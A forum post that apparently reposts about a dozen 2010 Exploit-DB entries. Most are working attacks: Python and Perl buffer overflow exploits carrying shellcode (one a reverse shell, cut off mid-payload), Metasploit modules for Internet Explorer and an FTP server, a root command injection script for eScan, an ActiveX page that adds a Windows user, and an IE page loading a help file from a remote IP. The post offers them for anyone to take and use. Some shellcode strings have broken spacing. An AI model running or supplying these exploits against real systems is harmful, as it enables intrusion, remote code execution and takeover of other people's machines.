
can be used for seeking the directories of the affected

system.





Iv. Sample code



the following is a simple example:



Get /../../../../../../etc/passwd http/1.1



in this example, the daemon has been started in the follows

path: /home/drosophila/downloads/uhttps/src





v. Fix



no patch.





Viii. Disclosure timeline



2010-03-10 bug discovered

2009-03-10 advisory release


# title: Sap gui version 7.00 bexglobal active-x unsecure method
# edb-id: 11879
# cve-id: ()
# osvdb-id: ()
# author: Alexey sintsov
# published: 2010-03-25
# verified: Yes
# download exploit code
# download n/a

view sourceprint?security vulnerability found in sap gui 7.10 and bi 7.0 that allows operating system functions to be called remotely.



Application: Sap gui

versions affected: Sap gui (sap gui 7.1)

vendor url: http://sap.com

bugs: Insecure method. Code execution.

Exploits: Yes

reported: 16.10.2009

vendor response: 27.10.2009

date of public advisory: 23.03.2010

author: Alexey sintsov from dsecrg



description

***********



insecure method was founded in sapbexcommonresources (class bexglobal) activex control component which is a part of sap gui.

One of the methods (execute) can be used to execute files on users system.







Details

*******



attacker can construct html page which call vulnerable function "execute" from activex object bexglobal.







Example (add user 'don_huan' with password 'p4ssw0rd'):

*******





<html>

<title>*dsecrg* add user *dsecrg*</title>

<object classid="clsid:a009c90d-814b-11d3-ba3e-080009d22344" id='dh'></object>



<script language='javascript'>

function init()

{

dh.execute("net.exe","user don_huan p4ssw0rd /add","d:\\windows\\",1,"",1);



}

init();

</script>

dsecrg

</html>







fix information

***************

all patches are available since december via note 1407285





references

**********



http://dsecrg.com/pages/vul/show.php?id=164

https://service.sap.com/sap/support/notes/1407285.









About

*****



digital security is leading it security company in russia, providing information security consulting, audit and penetration testing services, risk analysis and isms-related services and certification for iso/iec 27001:2005 and pci dss standards. Digital security research group focuses on ************ application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our ************site.

# title: Edisplay personal ftp server 1.0.0 multiple post-authentication stack bof
# edb-id: 11877
# cve-id: ()
# osvdb-id: ()
# author: Sud0
# published: 2010-03-25
# verified: Yes
# download exploit code
# download vulnerable app

view sourceprint?# exploit title : Edisplay personal ftp server 1.0.0 multiple post-authentication stack bof

# type of sploit: Remote code execution

# bug found by : Loneferret (march 19, 2010)

# reference : http://www.exploit-db.com/exploits/11810

# exploit date : March 24, 2010

# author : Sud0

# version : 1.0.0

# os : Windows

# tested on : Xp sp3 en (virtualbox)

# type of vuln : Seh

# greetz to : Corelanc0d3r and of course my friends and .... First of all my wife for supporting me and my obsession

# change ip and ftp account according to your server



import socket



junk="b" * 37 #seh overwritten after 37 bytes

nseh= "\x74\x20\x74\x20" # jmp forward (used a je to avoid bad chars)

seh= "\x69\x40\x2b\x20" # ppr from



#****************lcode for calc.exe encoded with alpha2 basereg = eax

****************lcode="pyiiiiiiiiiiqzvtx30vx4ap0a3 hh0a00abaabtaaq2ab2bb0bbxp8acjjilkjlv5lkjl3xq0wpq0 focxu33q2lsslmpezxv0nx9wmcirsgko8pa"



#****************lcode to align eax for decoder

align="\x5a\x5a\x5a\x52\x58\x2d\x3b\x55\x55\x55\x2 d\x3b\x55\x55\x55\x2d\x3b\x55\x55\x55"



buffer= junk+nseh+seh + "c"* 26 + align + "c" * 25 + ****************lcode + "a" * 50



print "sending exploit .... \r\n"

s=socket.socket(socket.af_inet,socket.sock_stream)

connect=s.connect(('192.168.56.101',21))

s.recv(1024)

s.send('user fox\r\n')

s.recv(1024)

s.send('pass mulder\r\n')

s.recv(1024)

s.send('rmd ' + buffer + '\r\n')

s.close



# title: Sap maxdb malformed handshake request remote code execution
# edb-id: 11886
# cve-id: ()
# osvdb-id: ()
# author: S2 crew
# published: 2010-03-26
# verified: Yes
# download exploit code
# download n/a

view sourceprint?#!/usr/bin/python



# exploit title: Sap maxdb malformed handshake request remote code execution

# date: 2010.03.26

# author: S2 crew [hungary]

# software link: Sap.com<http://sap.com>

# version: 7.7.06.09

# tested on: Windows xp sp2 en

# cve: Zdi-10-032

# code:

################################################## ###########

# trying 172.16.29.133...

# connected to 172.16.29.133.

# escape character is '^]'.

# microsoft windows xp [version 5.1.2600]

# (c) copyright 1985-2001 microsoft corp.

#

# c:\sdb\data\wrk>

################################################## ###########



import socket

import sys

import os



sc = (

"\x31\xc9\xda\xda\xbe\x94\x3f\xbe\xea\xb1\x56\xd9\ x74\x24\xf4"

"\x5f\x31\x77\x17\x03\x77\x17\x83\xef\xfc\x76\xca\ x42\x02\xff"

"\x35\xbb\xd3\x9f\xbc\x5e\xe2\x8d\xdb\x2b\x57\x01\ xaf\x7e\x54"

"\xea\xfd\x6a\xef\x9e\x29\x9c\x58\x14\x0c\x93\x59\ x99\x90\x7f"

"\x99\xb8\x6c\x82\xce\x1a\x4c\x4d\x03\x5b\x89\xb0\ xec\x09\x42"

"\xbe\x5f\xbd\xe7\x82\x63\xbc\x27\x89\xdc\xc6\x42\ x4e\xa8\x7c"

"\x4c\x9f\x01\x0b\x06\x07\x29\x53\xb7\x36\xfe\x80\ x8b\x71\x8b"

"\x72\x7f\x80\x5d\x4b\x80\xb2\xa1\x07\xbf\x7a\x2c\ x56\x87\xbd"

"\xcf\x2d\xf3\xbd\x72\x35\xc0\xbc\xa8\xb0\xd5\x67\ x3a\x62\x3e"

"\x99\xef\xf4\xb5\x95\x44\x73\x91\xb9\x5b\x50\xa9\ xc6\xd0\x57"

"\x7e\x4f\xa2\x73\x5a\x0b\x70\x1a\xfb\xf1\xd7\x23\ x1b\x5d\x87"

"\x81\x57\x4c\xdc\xb3\x35\x19\x11\x89\xc5\xd9\x3d\ x9a\xb6\xeb"

"\xe2\x30\x51\x40\x6a\x9e\xa6\xa7\x41\x66\x38\x56\ x6a\x96\x10"

"\x9d\x3e\xc6\x0a\x34\x3f\x8d\xca\xb9\xea\x01\x9b\ x15\x45\xe1"

"\x4b\xd6\x35\x89\x81\xd9\x6a\xa9\xa9\x33\x1d\xee\ x67\x67\x4d"

"\x98\x85\x97\x63\x04\x03\x71\xe9\xa4\x45\x29\x86\ x06\xb2\xe2"

"\x31\x79\x90\x5e\xe9\xed\xac\x88\x2d\x12\x2d\x9f\ x1d\xbf\x85"

"\x48\xd6\xd3\x11\x68\xe9\xfe\x31\xe3\xd1\x68\xcb\ x9d\x90\x09"

"\xcc\xb7\x43\xaa\x5f\x5c\x94\xa5\x43\xcb\xc3\xe2\ xb2\x02\x81"

"\x1e\xec\xbc\xb4\xe3\x68\x86\x7d\x3f\x49\x09\x7f\ xb2\xf5\x2d"

"\x6f\x0a\xf5\x69\xdb\xc2\xa0\x27\xb5\xa4\x1a\x86\ x6f\x7e\xf0"

"\x40\xf8\x07\x3a\x53\x7e\x08\x17\x25\x9e\xb8\xce\ x70\xa0\x74"

"\x87\x74\xd9\x69\x37\x7a\x30\x2a\x47\x31\x19\x1a\ xc0\x9c\xcb"

"\x1f\x8d\x1e\x26\x63\xa8\x9c\xc3\x1b\x4f\xbc\xa1\ x1e\x0b\x7a"

"\x59\x52\x04\xef\x5d\xc1\x25\x3a\x57")



egghunter = (

"\x66\x81\xca\xff\x0f\x42\x52\x6a"

"\x02\x58\xcd\x2e\x3c\x05\x5a\x74"

"\xef\xb8\x54\x30\x30\x57\x8b\xfa"

"\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

)



host = "172.16.29.133"

port = 7210



s = socket.socket(socket.af_inet, socket.sock_stream)

s.connect((host, port))



ret = "\x08\xf1\xa0\x00" # hc



packet = (

"\x63\x00\x00\x00\x03\x2f\x00\x00\x01\x00\x00\ x00"

"\xff\xff\xff\xff\x00\x00\x04\x00\x63\x00\x00\ x00"

"\x00\x02\x4b\x00\x04\x09\x00\x00\x44\x20\x00\ x00"

"\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\ xff"

"\x6d\x61" + ret + "\x00\x00\x00\x00\x00\x00"

"\x00\x00\x00\x00\x07\x49" + "a"*5000 + "t00wt00w" + sc + "\x41" * 2500 + egghunter + "\x90"*2500)



s.send(packet)

s.close()


ثغرات متنوعه كلها 2010 ان لقيت شئ تستفيد منه خذه وان مالقيت بلاش انتقادات ودمتم بود
  #3
xp-10
Active DeveloPer
 
الصورة الرمزية xp-10
 
   تاريخ التسجيل: 25 - 10 - 2009
   رقم العضوية : 80532
   المشاركات : 433
   بمعدل : 0.23 يوميا
   عدد النقاط : 217


xp-10 has a spectacular aura aboutxp-10 has a spectacular aura aboutxp-10 has a spectacular aura about

xp-10 غير متواجد حالياً




افتراضي رد: ثغرات متنوعه قديم اضيفت بتاريخ 22-Apr-2010, 01:21 AM بواسطة WEB


# title: Ie/opera source code viewer null character handling
# edb-id: 12156
# cve-id: ()
# osvdb-id: ()
# author: Daniel correa
# published: 2010-04-11
# verified: Yes
# download exploit code
# download n/a

view sourceprint?# exploit title: Ie/opera source code viewer null character handling

vulnerability

# date: 10/04/2010

# author: Daniel correa

# software link:

http://www.microsoft.com/windows/int...r/default.aspx

# software link: http://www.opera.com/download/

# version: Tested on ie 8, opera 10.51

# tested on: Windows xp; windows 7 + default ie 8

# cve :



# description :

The vulnerability in the source code viewer in both browsers (ie &

opera) is when they are processing the null control character (0×00),

including this character in the transmission message results in a

misunderstanding that is reflected in the concealment of the transmitted

message, only the code that is between valid tags is shown. In other

words, exploiting this vulnerability we can completely hide the source

code to the user of internet explorer and opera browsers.



# code:

The next code hide all the source code to source code viewer.

<?php

echo "\x00";

?>

esto es un mensaje oculto

this is a hide message

este es otro

thie is another one

...

Como vemos podemos esconder cualquier mensaje

as we can see we can hide any message

<html>

<head>

<title>titulo</title>

</head>

<body>

<h1>hola mundo</h1>

</body>

</html>



and the next,only hide part of the code (the script part)

<html>

<head>

<title>titulo</title>

</head>

<body>

<h1>hello world</h1>

</body>

</html>

<?php

echo chr(0);

?>

************************************************** **********('this code is never seen');</script>







package contain three proofs of concept:

http://www.sinfocol.org/archivos/201...opera_null.zip



--

sinfocol

http://www.sinfocol.org



la informaci&oacute;n contenida en este mensaje es confidencial y puede ser legalmente privilegiada. Est&aacute; destinado &uacute;nicamente para el destinatario. El acceso a este correo electr&oacute;nico por cualquier otra persona no est&aacute; autorizado. Si usted no es el destinatario, cualquier revelaci&oacute;n, copia, distribuci&oacute;n o cualquier acci&oacute;n u omitido que se adopten en la confianza en él, est&aacute; prohibida y puede ser ilegal.



The information in this email is confidential and may be legally privileged. It is intended solely for the addressee. Access to this email by anyone else is unauthorized. If you are not the intended recipient, any disclosure, copying, distribution or any action taken or omitted to be taken in reliance on it, is prohibited and may be unlawful.


# title: Apache spamassassin milter plugin remote root command execution
# edb-id: 11662
# cve-id: ()
# osvdb-id: ()
# author: Kingcope
# published: 2010-03-09
# verified: Yes
# download exploit code
# download n/a

view sourceprint?description: The spamassassin milter plugin suffers from a remote root command execution vulnerability. Full exploit details provided.

Author: Kingcope



spamassassin milter plugin remote root zeroday (btw zerodays lurk in the

shadows not here)

aka the postfix_joker advisory



logic fuckup?



March 07 2010 // if you read this 10 years later you are definetly

seeking the nice 0days!



Greetz fly out to alex,andi,adize :d

+++ keep it ultra priv8 +++



software

+-+-+-+-+

apache spamassassin

spamassassin is a mail filter which attempts to identify spam using

a variety of mechanisms including text analysis, bayesian filtering,

dns blocklists, and collaborative filtering databases.



Spamassassin is a project of the apache software foundation (asf).



Postfix

what is postfix? It is wietse venema's mailer that started life at ibm

research as an alternative to the widely-used sendmail program.

Postfix attempts to be fast, easy to administer, and secure.

The outside has a definite sendmail-ish flavor, but the inside is

completely different.



Spamassassin milter

a little plugin for the sendmail milter (mail filter) library

that pipes all incoming mail (including things received by rmail/uucp)

through the spamassassin, a highly customizable spamfilter.



Remote code execution vulnerability

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+



the spamassassin milter plugin can be tricked into executing any command

as the root user remotely.

If spamass-milter is run with the expand flag (-x option) it runs a

popen() including the attacker supplied

recipient (rcpt to).



>from spamass-milter-0.3.1 (-latest) line 820:



//

// gets called once for each recipient

//

// stores the first recipient in the spamassassin object and

// stores all addresses and the number thereof (some redundancy)

//



sfsistat

mlfi_envrcpt(smfictx* ctx, char** envrcpt)

{

struct context *sctx = (struct context*)smfi_getpriv(ctx);

spamassassin* assassin = sctx->assassin;

file *p;

#if defined(__freebsd__)

int rv;

#endif



debug(d_func, "mlfi_envrcpt: Enter");



if (flag_expand)

{

/* open a pipe to sendmail so we can do address

expansion */



char buf[1024];

char *fmt="%s -bv \"%s\" 2>&1";



#if defined(have_snprintf)

snprintf(buf, sizeof(buf)-1, fmt, sendmail, envrcpt[0]);

#else

/* xxx possible buffer overflow here // is this a

joke ?! */

sprintf(buf, fmt, sendmail, envrcpt[0]);

#endif



debug(d_rcpt, "calling %s", buf);



#if defined(__freebsd__) /* popen bug - see pr bin/50770 */

rv = pthread_mutex_lock(&popen_mutex);

if (rv)

{

debug(d_always, "could not lock popen mutex: %

s", strerror(rv));

abort();

}

#endif



p = popen(buf, "r"); [1]

if (!p)

{

debug(d_rcpt, "popen failed(%s). Will not

expand aliases", strerror(errno));

assassin->expandedrcpt.push_back(envrcpt[0]);





[1] the vulnerable popen() call.



Remote root exploit poc through postfix

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+



$ nc localhost 25

220 ownthabox esmtp postfix (ubuntu)

mail from: me@me.com

250 2.1.0 ok

rcpt to: Root+:"|touch /tmp/foo"

250 2.1.5 ok



$ ls -la /tmp/foo

-rw-r--r-- 1 root root 0 2010-03-07 19:46 /tmp/foo



signed,



kingcope

# title: Microworld escan antivirus < 3.x remote root command execution
# edb-id: 11720
# cve-id: ()
# osvdb-id: ()
# author: Mohammed almutairi
# published: 2010-03-13
# verified: No
# download exploit code
# download n/a

view sourceprint?#!/usr/bin/env python

import sys

from socket import *



#auther: Mohammed almutairi

#(sa.attacker@gmail.com)

"""

microworld escan antivirus < 3.x remote root command execution

package mwadmin package vulnerabilities (linux)

the base packages (mwadmin and mwav) must be installed before escan

link:

http://www.escanav.com/english/conte...x_products.asp

infcted: All version 3.x escan linux

1-escan for linux desktop

2-escan for linux file servers

3-mailscan for linux and ************scan

tested on redhat and fedora

ultra priv8



description:



From /opt/microworld/var/www/htdocs/forgotpassword.php:

Include("common_functions.php"); <---> (1)



if ($_post['forgot'] == "send password")

{

$user = $_post["uname"]; <--->(2) insecure:(





vulnerable code in forgotpassword.php and common_functions.php

in (1) $runasroot = "/opt/microworld/sbin/runasroot";

we can injection through via the file forgotpassword.php as you can see (2)

with remote root command execution

>> escan.py www.***.com

escan@/bin/sh:$sa$ => reboot
[*] done! Sent to: www.***.com

"""



def xpl():

If len(sys.argv) < 2:

Print "[*] microworld escan antivirus remote root command execution"

print "[*] exploited by mohammed almutairi"

print "[*] usage: %s host" % sys.argv[0]

return



host = sys.argv[1]

port = 10080 # default port

cmd = raw_input("escan@/bin/sh:$sa$ => ")

sock=socket(af_inet, sock_stream)

sock.connect((host,port))

sh="/opt/microworld/sbin/runasroot /bin/sh -c '%s'" % cmd



sa= "uname=;%s;" %sh # (;sh;) ---> here play see to ^(2)^

sa+= "&forgot=send+password"



s="post /forgotpassword.php http/1.1\r\n"

s+="host: %s:%d\r\n"%(host, port)

s+="user-agent: */*\r\n"

s+="accept: Ar,en-us;q=0.7,en;q=0.3\r\n"

s+="content-type: Application/x-www-form-urlencoded\r\n"

s+="content-length: %d \r\n\r\n"%len(sa)

s+=sa



sock.sendall(s)

print "[*] done! Sent to: %s" % host

sock.close()



if __name__=="__main__":

Xpl()

sys.exit(0)


# title: Skype - uri handler input validation
# edb-id: 11694
# cve-id: ()
# osvdb-id: ()
# author: Paul craig
# published: 2010-03-11
# verified: Yes
# download exploit code
# download n/a

view sourceprint?description

the windows skype client implements two uri handlers, skype: And skype-plugin. Both handlers allow for easy browser integration and are supported by all modern browsers. When a skype link is clicked, the skype.exe process is spawned with the /uri: Command argument, followed by the user specified phone number or contact name.

For example, clicking the link: Skype:paulcraig will spawn the process skype.exe “/uri:skype:paulcraig“



due to a flaw in the current user input validation performed by skype, it is possible to append additional command line arguments which are subsequently processed during the launch of skype.exe.

In 2006 colleague brett moore, discovered a similar vulnerability in skype which led to certain security restrictions being enforced when using the skype: Uri handler. Brett’s exploit at the time involved including additional command line arguments to the skype.exe process which would send a file to a remote user when a skype link was clicked. Changes were made to skype to remove available command line arguments when the /uri argument is present.

Although many of the useful arguments have been disallowed (such as sending a file to a remote user)

security-assessment.com found that the /datapath argument can be included and directed to a remote smb share directly through the skype uri handler. The datapath argument specifies where the skype configuration files and security policy is kept. Specifying a datapath argument will override any local security policy defined in the windows registry.

A remote user is capable of crafting a link that when clicked, will spawn skype.exe on a client using a datapath location which is present on a remote smb share. The skype client will load any configuration or security policy present and save the users skype account information to the remote share.

This allows a remote user to control the skype configuration and security policy of the local client instance of skype. Settings such as a remote ******************** can be defined, which could be used to man in the middle skype communications.



Security-assessment.com also found that the contents of another user’s datapath contained a wealth of private information and call history associated with the user.



Exploitation



exploitation occurs when the victim clicks a malformed skype link in internet explorer (6,7 or 8) or chrome. The exploit originates from a failure to sanitise raw binary content correctly, and the ability of ****************lexecute() to permit uris which contain raw binary values.

Security-assessment.com found that the skype: Uri handler permits the double quote and forward slash (“ and /) characters within a skype uri, but does not permit any whitespace characters (such as space, %20, +) to be included. This essentially protects skype from a user inserting additional command line arguments directly within the skype: Link, as a command line argument separator character (whitespace) cannot be included. However, the use of a raw binary byte is permitted by skype and the byte is subsequently treated as a whitespace value when parsing skype.exe command line arguments. This provides a whitespace character, without being a traditional whitespace. This method of whitespace character injection can be used to include additional command line arguments to the skype.exe process.



The example below illustrates this.



<a href=skype:a"0x01/secondary0x01/datapath:"\\remotehost\share\exploit>click me</a>



where 0x01 represents the raw binary byte value 0x01.



This url will result in the skype configuration being retrieved from the remote host ‘remotehost’. Once a user has authenticated using skype, the skype client will download their chat history and call logs to the remote share.

Other arguments such as /username and /password can also be included using the same method of whitespace injection. This is illustrated below.



<a href=skype:a"0x01/secondary0x01/username:"test”0x01/password:”test>click me</a>



the bytes 0x01-0x07 were found to function as a replacement for a whitespace character.



Recommendations



skype have created a fix for this vulnerability which has been included as part of skype v4.2 hotfix #1.

Security-assessment.com recommends all users of skype upgrade to the latest version as soon as possible.



For more information on the new release of skype please refer to the release notes:

http://share.skype.com/sites/garage/..._4.2.0.155.pdf



about security-assessment.com



security-assessment.com is australasia’s leading team of information security consultants specialising in providing high quality information security services to clients throughout the asia pacific region. Our clients include some of the largest globally recognized companies in areas such as finance, telecommunications, broadcasting, legal and government. Our aim is to provide the very best independent advice and a high level of technical expertise while creating long and lasting professional relationships with our clients.

Security-assessment.com is committed to security research and development, and its team continues to identify and responsibly publish vulnerabilities in public and private software vendor's products. Members of the security-assessment.com r&d team are globally recognized through their release of whitepapers and presentations related to new security research.



For further information on this issue or any of our service offerings, contact us:



************: www.security-assessment.com

email: info@security-assessment.com

# title: Microsoft internet explorer iepeers.dll use-after-free exploit (****************)
# edb-id: 11683
# cve-id: ()
# osvdb-id: ()
# author: Trancer
# published: 2010-03-10
# verified: Yes
# download exploit code
# download n/a

view sourceprint?##

# ie_iepeers_pointer.rb

#

# microsoft internet explorer iepeers.dll use-after-free exploit for the ****************sploit framework

#

# tested successfully on the following platforms:

# - microsoft internet explorer 7, windows vista sp2

# - microsoft internet explorer 7, windows xp sp3

# - microsoft internet explorer 6, windows xp sp3

#

# exploit found in-the-wild. For additional details:

# http://www.rec-sec.com/2010/03/10/in...-free-exploit/

#

# trancer

# http://www.rec-sec.com

##



require 'msf/core'



class ****************sploit3 < msf::exploit::remote

rank = goodranking



include msf::exploit::remote::httpserver::html



def initialize(info = {})

super(update_info(info,

'name' => 'microsoft internet explorer iepeers.dll use-after-free',

'description' => %q{

this module exploits a use-after-free vulnerability within iepeers.dll of

microsoft internet explorer versions 6 and 7.



Note: Internet explorer 8 and internet explorer 5 are not affected.

},

'license' => msf_license,

'author' => [

'trancer <mtrancer[at]gmail.com>'

],

'version' => '$revision:$',

'references' =>

[

[ 'cve', '2010-0806' ],

[ 'osvdb', '62810' ],

[ 'bid', '38615' ],

[ 'url', 'http://www.microsoft.com/technet/security/advisory/981374.mspx' ],

[ 'url', 'http://www.avertlabs.com/research/blog/index.php/2010/03/09/targeted-internet-explorer-0day-attack-announced-cve-2010-0806/' ]

],

'defaultoptions' =>

{

'exitfunc' => 'process',

'initialautorunscript' => 'migrate -f',

},

'payload' =>

{

'space' => 1024,

'badchars' => "\x00\x09\x0a\x0d'\\",

'stackadjustment' => -3500,

},

'platform' => 'win',

'targets' =>

[

[ 'windows xp sp0-sp3 / ie 6.0 sp0-2 & ie 7.0', { 'ret' => 0x0c0c0c0c } ]

],

'disclosuredate' => 'mar 09 2010',

'defaulttarget' => 0))

end



def on_request_uri(cli, request)



# re-generate the payload

return if ((p = regenerate_payload(cli)) == nil)



# encode the ****************lcode

****************lcode = rex::text.to_unescape(payload.encoded, rex::arch.endian(target.arch))



# set the return\nops

ret = rex::text.to_unescape([target.ret].pack('v'))



# randomize the javascript variable names

j_****************lcode = rand_text_alpha(rand(100) + 1)

j_nops = rand_text_alpha(rand(100) + 1)

j_slackspace = rand_text_alpha(rand(100) + 1)

j_fillblock = rand_text_alpha(rand(100) + 1)

j_memory = rand_text_alpha(rand(100) + 1)

j_counter = rand_text_alpha(rand(30) + 2)

j_ret = rand_text_alpha(rand(100) + 1)

j_array = rand_text_alpha(rand(100) + 1)

j_function1 = rand_text_alpha(rand(100) + 1)

j_function2 = rand_text_alpha(rand(100) + 1)

j_object = rand_text_alpha(rand(100) + 1)

j_id = rand_text_alpha(rand(100) + 1)



# build out the message

html = %q|<html><body>

<button id='#{j_id}' onclick='#{j_function2}();' style='display:none'></button>

<script language='javascript'>

function #{j_function1}(){

var #{j_****************lcode} = unescape('#{****************lcode}');

#{j_memory} = new array();

var #{j_slackspace} = 0x86000-(#{j_****************lcode}.length*2);

var #{j_nops} = unescape('#{ret}');

while(#{j_nops}.length<#{j_slackspace}/2) { #{j_nops}+=#{j_nops}; }

var #{j_fillblock} = #{j_nops}.substring(0,#{j_slackspace}/2);

delete #{j_nops};

for(#{j_counter}=0; #{j_counter}<270; #{j_counter}++) {

#{j_memory}[#{j_counter}] = #{j_fillblock} + #{j_fillblock} + #{j_****************lcode};

}

}

function #{j_function2}(){

#{j_function1}();

var #{j_object} = document.createelement('body');

#{j_object}.addbehavior('#default#userdata');

document.appendchild(#{j_object});

try {

for (#{j_counter}=0; #{j_counter}<10; #{j_counter}++) {

#{j_object}.setattribute('s',window);

}

} catch(e){ }

window.status+='';

}



document.getelementbyid('#{j_id}').onclick();

</script></body></html>|



print_status("sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")



# transmit the compressed response to the client

send_response(cli, html, { 'content-type' => 'text/html' })



# handle the payload

handler(cli)



end



end


# title: Sap gui version 7.10 ************viewer3d active-x jit-spray exploit
# edb-id: 11661
# cve-id: ()
# osvdb-id: ()
# author: Alexey sintsov
# published: 2010-03-09
# verified: Yes
# download exploit code
# download n/a

view sourceprint?sap gui version 7.10 ************viewer3d active-x jit-spray exploit

author: Alexey sintsov

homepage: http://www.dsec.ru/



http://www.exploit-db.com/sploits/11661.zip

# title: Easy ftp server v1.7.0.2 cwd remote bof - msf module
# edb-id: 11668
# cve-id: ()
# osvdb-id: ()
# author: Blake
# published: 2010-03-09
# verified: Yes
# download exploit code
# download vulnerable app

view sourceprint?# exploit title: Easy~ftp

# date: March 9, 2010

# author: Blake

# version: 1.7.0.2

# tested on: Windows xp sp3

# cve :



Require 'msf/core'





class ****************sploit3 < msf::exploit::remote

rank = averageranking



include msf::exploit::remote::ftp



def initialize(info = {})

super(update_info(info,

'name' => 'easy~ftp server v1.7.0.2 cwd command buffer overflow',

'description' => %q{

this module exploits a stack overflow in the cwd verb in easy~ftp server.



You must have valid credentials to trigger this vulnerability.

},

'author' => 'blake',

'license' => msf_license,

'version' => 'version 1',

'references' =>

[

[ 'cve', ''],

[ 'osvdb', ''],

[ 'edb-id', '11539'],

[ 'url', 'http://www.exploit-db.com/exploits/11539' ],

],

'privileged' => true,

'defaultoptions' =>

{

'exitfunc' => 'process',

},

'payload' =>

{

'space' => 268,

'badchars' => "\x00\x20\x0a\x0d\x2f\x5c",

'stackadjustment' => -3500,

},

'platform' => 'win',

'targets' =>

[



[ 'windows xp sp3 english', { 'ret' => 0x009afd58 } ],



],

'disclosuredate' => 'february 15, 2010',

'defaulttarget' => 0))

end





def exploit

connect_login



sploit = "\x90" * (268 - payload.encoded.length)

sploit << payload.encoded

sploit << [target.ret].pack('v')



print_status("trying target #{target.name<http://target.name>}...")



send_cmd( ['cwd', sploit] , false)



handler

disconnect

end



end


# title: Internet explorer 'winhlp32.exe' 'msgbox()' remote code execution vulnerability
# edb-id: 11615
# cve-id: ()
# osvdb-id: ()
# author: Maurycy prodeus
# published: 2010-03-02
# verified: Yes
# download exploit code
# download n/a

view sourceprint?microsoft internet explorer is prone to a remote code execution vulnerability.



Source (isec security research):

http://isec.pl/vulnerabilities10.html



attackers can exploit this issue to execute arbitrary code in the context of the user running the application. Successful exploits will compromise the application and possibly the underlying computer.



Note attackers must use social-engineering techniques to convince an unsuspecting user to press the 'f1' key when the attacker's message box prompts them to do so.



Internet explorer 6, 7, and 8 are vulnerable when running on the windows xp platform.



================================================== =============

a copy of test.hlp can be downloaded from here:

http://www.exploit-db.com/sploits/msgbox_test_help.zip

================================================== =============



<html>

<script type="text/vbscript">

big = "\\184.73.14.110\public\test.hlp"



//for i=1 to 2500

// big = big & "\..\"

//next





msgbox "please press f1 to save the world", ,"please save the world",

big, 1

msgbox "press f1 to close this annoying popup", ,"", big, 1

msgbox "press f1 to close this annoying popup", ,"", big, 1

</script>

</html>

# title: Prosshd v1.2 20090726 buffer overflow exploit
# edb-id: 11618
# cve-id: ()
# osvdb-id: ()
# author: S2 crew
# published: 2010-03-02
# verified: Yes
# download exploit code
# download vulnerable app

view sourceprint?# author: S2 crew [hungary]

# tested on: Windows xp sp2
 en

# cve: -



# registers:

# eax 000003e4

# ecx 0012ed44

# edx 7c90eb94 ntdll.kifastsystemcallret

# ebx 00000674

# esp 0012efc0 ascii "bbbbbbbbbbbbbbbbbb..."

# ebp 0012f3dc ascii "bbbbbbbbbbbbbbbbbb..."

# esi 7c81dd9a kernel32.createpipe

# edi 0012f3d8 ascii "bbbbbbbbbbbbbbbbbbb..."

# eip 77d5b8d6 user32.77d5b8d6



#!/usr/bin/perl



use net::ssh2;



$username = 'test';

$password = 'test';



$host = '172.16.29.133';

$port = 22;


[*] x86/alpha_mixed succeeded with size 692 (iteration=1) reverse_****************l_tcp

$****************l =

"\x89\xe5\xda\xd7\xd9\x75\xf4\x5e\x56\x59\x49\x49\ x49\x49" .

"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\ x37\x51" .

"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\ x51\x32" .

"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\ x38\x41" .

"\x42\x75\x4a\x49\x4b\x4c\x48\x68\x4e\x69\x45\x50\ x47\x70" .

"\x43\x30\x51\x70\x4f\x79\x4b\x55\x44\x71\x4e\x32\ x51\x74" .

"\x4e\x6b\x43\x62\x44\x70\x4e\x6b\x46\x32\x46\x6c\ x4e\x6b" .

"\x51\x42\x45\x44\x4c\x4b\x50\x72\x51\x38\x46\x6f\ x4f\x47" .

"\x51\x5a\x51\x36\x50\x31\x4b\x4f\x45\x61\x4b\x70\ x4e\x4c" .

"\x47\x4c\x51\x71\x43\x4c\x47\x72\x46\x4c\x47\x50\ x4a\x61" .

"\x48\x4f\x46\x6d\x45\x51\x4f\x37\x4d\x32\x4c\x30\ x51\x42" .

"\x51\x47\x4e\x6b\x51\x42\x44\x50\x4c\x4b\x50\x42\ x47\x4c" .

"\x43\x31\x48\x50\x4e\x6b\x43\x70\x51\x68\x4e\x65\ x49\x50" .

"\x43\x44\x42\x6a\x47\x71\x4e\x30\x50\x50\x4c\x4b\ x50\x48" .

"\x47\x68\x4e\x6b\x46\x38\x51\x30\x45\x51\x4b\x63\ x48\x63" .

"\x47\x4c\x51\x59\x4c\x4b\x50\x34\x4c\x4b\x45\x51\ x48\x56" .

"\x45\x61\x49\x6f\x50\x31\x49\x50\x4c\x6c\x49\x51\ x48\x4f" .

"\x44\x4d\x45\x51\x4a\x67\x47\x48\x4d\x30\x50\x75\ x48\x74" .

"\x43\x33\x43\x4d\x4c\x38\x45\x6b\x51\x6d\x46\x44\ x43\x45" .

"\x4a\x42\x51\x48\x4e\x6b\x46\x38\x47\x54\x47\x71\ x4a\x73" .

"\x42\x46\x4e\x6b\x44\x4c\x42\x6b\x4c\x4b\x51\x48\ x47\x6c" .

"\x46\x61\x4e\x33\x4c\x4b\x43\x34\x4c\x4b\x46\x61\ x48\x50" .

"\x4d\x59\x43\x74\x44\x64\x46\x44\x51\x4b\x43\x6b\ x50\x61" .

"\x43\x69\x51\x4a\x46\x31\x4b\x4f\x49\x70\x43\x68\ x43\x6f" .

"\x50\x5a\x4c\x4b\x42\x32\x48\x6b\x4b\x36\x51\x4d\ x50\x68" .

"\x45\x63\x45\x62\x47\x70\x45\x50\x42\x48\x42\x57\ x44\x33" .

"\x45\x62\x43\x6f\x46\x34\x42\x48\x50\x4c\x42\x57\ x51\x36" .

"\x44\x47\x49\x6f\x4a\x75\x4f\x48\x4c\x50\x46\x61\ x47\x70" .

"\x45\x50\x45\x79\x4f\x34\x46\x34\x46\x30\x50\x68\ x45\x79" .

"\x4b\x30\x42\x4b\x47\x70\x49\x6f\x4b\x65\x46\x30\ x42\x70" .

"\x42\x70\x42\x70\x51\x50\x46\x30\x51\x50\x50\x50\ x43\x58" .

